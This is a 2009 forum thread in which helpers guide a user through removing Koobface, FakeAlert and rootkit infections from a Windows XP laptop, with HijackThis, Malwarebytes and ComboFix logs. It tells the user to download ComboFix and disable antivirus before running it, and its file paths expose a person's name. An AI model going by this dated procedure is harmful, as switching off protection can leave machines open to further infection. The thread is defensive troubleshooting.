O4 - HKLM\..\Run: [DMHotKey] C:\Program Files\Samsung\Easy Display Manager\DMLoader.exe
O4 - HKLM\..\Run: [MagicKeyboard] C:\Program Files\SAMSUNG\MagicKBD\PreMKBD.exe
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: OpenOffice.org 3.1.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send To Bluetooth - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {8100D56A-5661-482C-BEE8-AFECE305D968} (Facebook Photo Uploader 5 Control) - http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour-tjänst (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: DCSHost.exe - Unknown owner - C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: S3Funkey - Unknown owner - C:\Program.exe (file missing)
O23 - Service: S3LoadSv - Unknown owner - C:\Program.exe (file missing)
O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

--
End of file - 9890 bytes
f-arn (Guru)
19 September 2009 - 12:59 #4
I wrote about Malwarebytes:
Install and start the program, update, run "Quick Scan" under the "Scanner" tab.
Afterwards click "Show results", press "Remove Selected" and post the log here together with a new HijackThis log.

NB: When you update Malwarebytes, click "Update" until it says there are no more updates.

I have Database version: 2823
claes57 (Expert)
19 September 2009 - 13:01 #5
The best cleanup is, in the first instance, to run it from outside.
That is, move the HD into an external enclosure (or just a http://sandberg.dk/product.aspx?id=133-43, which is brilliant to have lying around)
and then connect the HD to a machine that is fully updated with virus scanning and Ad-Aware.
Scan the disk, and most of the junk is gone.
sir_smokealot (Beginner)
19 September 2009 - 13:03 #6
Wrong log file... here is the right one

Malwarebytes' Anti-Malware 1.41
Database version: 2823
Windows 5.1.2600 Service Pack 3

2009-09-20 12:28:22
mbam-log-2009-09-20 (12-28-22).txt

Scan type: Quick Scan
Objects scanned: 85309
Time elapsed: 6 minute(s), 22 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 7
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 11

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\NetworkNeighborhood\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe (Rogue.Installer) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\drivers\Filter.sys (Rootkit.DNCBlocker) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\install.exe (Rogue.Installer) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252782631 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252791927 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252831567 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252922204 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252927143 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253045842 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253307189 (Trojan.Dropper) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253439510 (Trojan.Dropper) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\zazodin_1253440499.exe (Worm.Koobface) -> Quarantined and deleted successfully.
19 September 2009 - 13:13 #7
<claes57>: Ref #5 - that is 'nonsense' - that way you do not get hold of the registry on the 'infected' HD, but only loose folders/files ...
f-arn (Guru)
19 September 2009 - 13:18 #8
Download and save ComboFix to your desktop:

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

or from here

http://subs.geekstogo.com/ComboFix.exe

Then run combofix.exe and follow the instructions.
Important--> Disable your antivirus program, as it can interfere with ComboFix.
You should not click on the window while the tool is running, as it can cause your computer to freeze.
When ComboFix is finished, and after it has (possibly) restarted, a log file should open: combofix.txt
Please post the contents of this file here.

It can be found here: C:\Combofix.txt
sir_smokealot (Beginner)
19 September 2009 - 14:11 #9
ComboFix 09-09-18.02 - Yngve Ralph 2009-09-20 13:54.1.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.470 [GMT 2:00]
Running from: c:\documents and settings\Yngve Ralph\Desktop\ComboFix.exe
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\Yngve Ralph\d4fderx3_3424.exe
c:\recycler\S-1-5-21-220523388-1645522239-1417001333-1003
c:\windows\msetup
c:\windows\msetup\MSetup.exe
c:\windows\Tasks\At1.job
c:\windows\Tasks\At10.job
c:\windows\Tasks\At11.job
c:\windows\Tasks\At12.job
c:\windows\Tasks\At13.job
c:\windows\Tasks\At14.job
c:\windows\Tasks\At15.job
c:\windows\Tasks\At16.job
c:\windows\Tasks\At17.job
c:\windows\Tasks\At18.job
c:\windows\Tasks\At19.job
c:\windows\Tasks\At2.job
c:\windows\Tasks\At20.job
c:\windows\Tasks\At21.job
c:\windows\Tasks\At22.job
c:\windows\Tasks\At23.job
c:\windows\Tasks\At24.job
c:\windows\Tasks\At3.job
c:\windows\Tasks\At4.job
c:\windows\Tasks\At5.job
c:\windows\Tasks\At6.job
c:\windows\Tasks\At7.job
c:\windows\Tasks\At8.job
c:\windows\Tasks\At9.job

.
(((((((((((((((((((((((((((((((((((((((  Drivers/Services  )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_DDNSFILTER
-------\Service_SfX


(((((((((((((((((((((((((  Files Created from 2009-08-20 to 2009-09-20  )))))))))))))))))))))))))))))))
.

2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:54    38224    ----a-w-    c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:53    19160    ----a-w-    c:\windows\system32\drivers\mbam.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\program files\Malwarebytes' Anti-Malware
2009-09-20 09:45 . 2009-09-20 09:45    --------    d-----w-    c:\program files\CCleaner
2009-09-20 08:44 . 2009-09-20 08:44    --------    d-----w-    c:\program files\Trend Micro
2009-09-18 21:27 . 2009-09-18 21:27    17564    ---ha-w-    c:\windows\system32\mlfcache.dat
2009-09-18 21:19 . 2009-09-18 21:20    --------    d-----w-    c:\program files\Safari
2009-09-18 21:12 . 2009-09-18 21:12    --------    d-----w-    c:\program files\iPod
2009-09-18 21:12 . 2009-09-18 21:21    --------    d-----w-    c:\program files\iTunes
2009-09-18 21:12 . 2009-09-18 21:14    --------    d-----w-    c:\documents and settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08 . 2009-09-18 21:08    2198    ----a-w-    C:\k48N.bat
2009-09-18 21:08 . 2009-09-18 21:09    --------    d-----w-    c:\program files\QuickTime
2009-09-18 20:53 . 2009-09-18 20:53    1    ---h--w-    c:\windows\bk23567.dat
2009-09-13 08:45 . 2009-09-20 10:16    --------    d-----w-    c:\program files\webserver
2009-09-07 14:00 . 2009-09-07 14:00    1    ---h--w-    c:\windows\e323567.dat
2009-08-26 19:48 . 2009-08-26 19:53    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:49    --------    d-----w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:48    --------    d-----w-    c:\program files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12 . 2009-08-12 16:19    --------    d-----w-    c:\program files\Common Files\Apple
2009-08-28 17:42 . 2009-08-12 16:19    40448    ----a-w-    c:\windows\system32\drivers\usbaapl.sys
2009-08-28 17:42 . 2009-08-12 16:19    2065696    ----a-w-    c:\windows\system32\usbaaplrc.dll
2009-08-12 16:27 . 2009-08-12 16:27    17536    ----a-w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23 . 2009-08-12 16:22    --------    d-----w-    c:\documents and settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22 . 2009-08-12 16:20    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple Computer
2009-08-12 16:22 . 2009-08-12 16:22    --------    d-----w-    c:\program files\Bonjour
2009-08-12 16:20 . 2009-08-12 16:20    --------    d-----w-    c:\program files\Apple Software Update
2009-08-12 16:19 . 2009-08-12 16:19    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple
2009-08-11 15:06 . 2009-03-27 20:22    --------    d-----w-    c:\program files\McAfee
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\program files\Comviq Surf Connect
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\documents and settings\All Users\Application Data\DatacardService
2009-08-05 09:01 . 2009-03-27 18:48    204800    ----a-w-    c:\windows\system32\mswebdvd.dll
2009-07-17 19:01 . 2009-03-27 18:48    58880    ----a-w-    c:\windows\system32\atl.dll
2009-07-13 21:43 . 2009-03-27 18:48    286208    ----a-w-    c:\windows\system32\wmpdxm.dll
2009-07-09 03:03 . 2009-07-09 03:04    410984    ----a-w-    c:\windows\system32\deploytk.dll
2009-07-03 17:09 . 2009-03-27 18:48    915456    ----a-w-    c:\windows\system32\wininet.dll
.

------- Sigcheck -------

  • 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
  • 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
[7] 2008-04-14 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\tcpip.sys

  • 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\es.dll
  • 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\dllcache\es.dll
  • 2008-07-07 20:23 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . c:\windows\$hf_mig$\KB950974\SP3QFE\es.dll
[7] 2008-04-14 12:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . c:\windows\$NtUninstallKB950974$\es.dll

  • 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\kernel32.dll
  • 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\dllcache\kernel32.dll
  • 2009-03-21 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781] . . c:\windows\$hf_mig$\KB959426\SP3QFE\kernel32.dll
[7] 2008-04-14 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB959426$\kernel32.dll

  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\mswsock.dll
  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\mswsock.dll
  • 2008-06-20 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\mswsock.dll
[7] 2008-04-14 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 39408]
"MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-07-09 148888]
"EDS"="c:\program files\Samsung\Samsung EDS\EDSAgent.exe" [2007-12-21 659456]
"Chrome3"="c:\program files\s3graphics\chrome3\Chrome3.exe" [2009-04-30 1274368]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-28 1044480]
"SUPBackGround"="c:\program files\Samsung\Samsung Update Plus\SUPBackGround.exe" [2008-12-04 298664]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2008-06-12 34672]
"BatteryManager"="c:\program files\Samsung\Samsung Battery Manager\BatteryManager.exe" [2008-11-27 2768896]
"DMHotKey"="c:\program files\Samsung\Easy Display Manager\DMLoader.exe" [2006-12-27 466944]
"MagicKeyboard"="c:\program files\SAMSUNG\MagicKBD\PreMKBD.exe" [2006-05-15 151552]
"mcagent_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2008-10-31 641208]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2008-12-03 218408]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2009-09-04 417792]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-09-08 305440]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.EXE [2008-11-17 17676288]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Yngve Ralph\Start Menu\Programs\Startup\
OpenOffice.org 3.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2009-4-16 384000]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2008-9-17 580200]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8085:TCP"= 8085:TCP:ddnsfilter
"53:TCP"= 53:TCP:webserver

R2 DCSHost.exe;DCSHost.exe;c:\documents and settings\All Users\Application Data\DatacardService\DCSHOST.exe [2009-08-05 110592]
R2 DOSMEMIO;MEMIO;c:\windows\system32\MEMIO.SYS [2009-03-27 4300]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-03-27 203280]
R2 S3Funkey;S3Funkey;c:\program files\s3graphics\chrome3\S3Funkey.svc [2009-04-30 444416]
R2 S3LoadSv;S3LoadSv;c:\program files\s3graphics\chrome3\s3loadsv.svc [2009-04-30 387072]
R2 yksvc;Marvell Yukon Service;RUNDLL32.EXE ykx32mpcoinst,serviceStartProc --> RUNDLL32.EXE ykx32mpcoinst,serviceStartProc [?]
R3 DNSeFilter;DNSeFilter;c:\windows\system32\drivers\SamsungEDS.SYS [2008-01-15 30208]
R3 S3GIGP;S3GIGP;c:\windows\system32\drivers\S3gIGPm.sys [2009-03-27 581632]
R3 vcrdrx32;VIA MSP Cardreader Host Controller;c:\windows\system32\drivers\vcrdrx32.sys [2009-03-27 90752]
R3 VMC326;Vimicro Camera Service VMC326;c:\windows\system32\drivers\VMC326.sys [2009-03-27 238464]
S1 Filter;Filter;\??\c:\windows\system32\drivers\Filter.sys --> c:\windows\system32\drivers\Filter.sys [?]
S3 hwusbfake;Huawei DataCard USB Fake;c:\windows\system32\drivers\ewusbfake.sys [2009-08-05 102656]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
Contents of the 'Scheduled Tasks' folder

2009-08-24 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 10:34]

2009-03-27 c:\windows\Tasks\McDefragTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-03-27 c:\windows\Tasks\McQcTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-09-20 c:\windows\Tasks\User_Feed_Synchronization-{4C2CC653-8D8B-4747-B339-A00CA8CB617E}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/ig/redirectdomain?brand=SMSN&bmod=SMSN
uInternet Settings,ProxyOverride = *.local
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send To Bluetooth - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-VTTimer - VTTimer.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-20 14:01
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ... 

scanning hidden autostart entries ...

scanning hidden files ... 

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3Funkey]
"ImagePath"="c:\program files\s3graphics\chrome3\s3funkey.svc"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3LoadSv]
"ImagePath"="c:\program files\s3graphics\chrome3\s3loadsv.svc"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(2280)
c:\windows\system32\WININET.dll
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\btmmhook.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\btncopy.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\progra~1\McAfee\MSC\mcmscsvc.exe
c:\progra~1\McAfee.com\Agent\mcagent.exe
c:\progra~1\COMMON~1\McAfee\MNA\McNASvc.exe
c:\program files\Samsung\MagicKBD\MagicKBD.exe
c:\progra~1\COMMON~1\McAfee\McProxy\McProxy.exe
c:\progra~1\McAfee\VIRUSS~1\Mcshield.exe
c:\program files\OpenOffice.org 3\program\soffice.exe
c:\program files\OpenOffice.org 3\program\soffice.bin
c:\program files\McAfee\MPF\MpfSrv.exe
c:\program files\McAfee\MSK\msksrver.exe
c:\progra~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2009-09-20 14:05 - machine was rebooted
ComboFix-quarantined-files.txt  2009-09-20 12:05

Pre-Run: 61 209 530 368 bytes free
Post-Run: 61 144 289 280 bytes free

WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect

274    --- E O F ---    2009-08-26 20:50
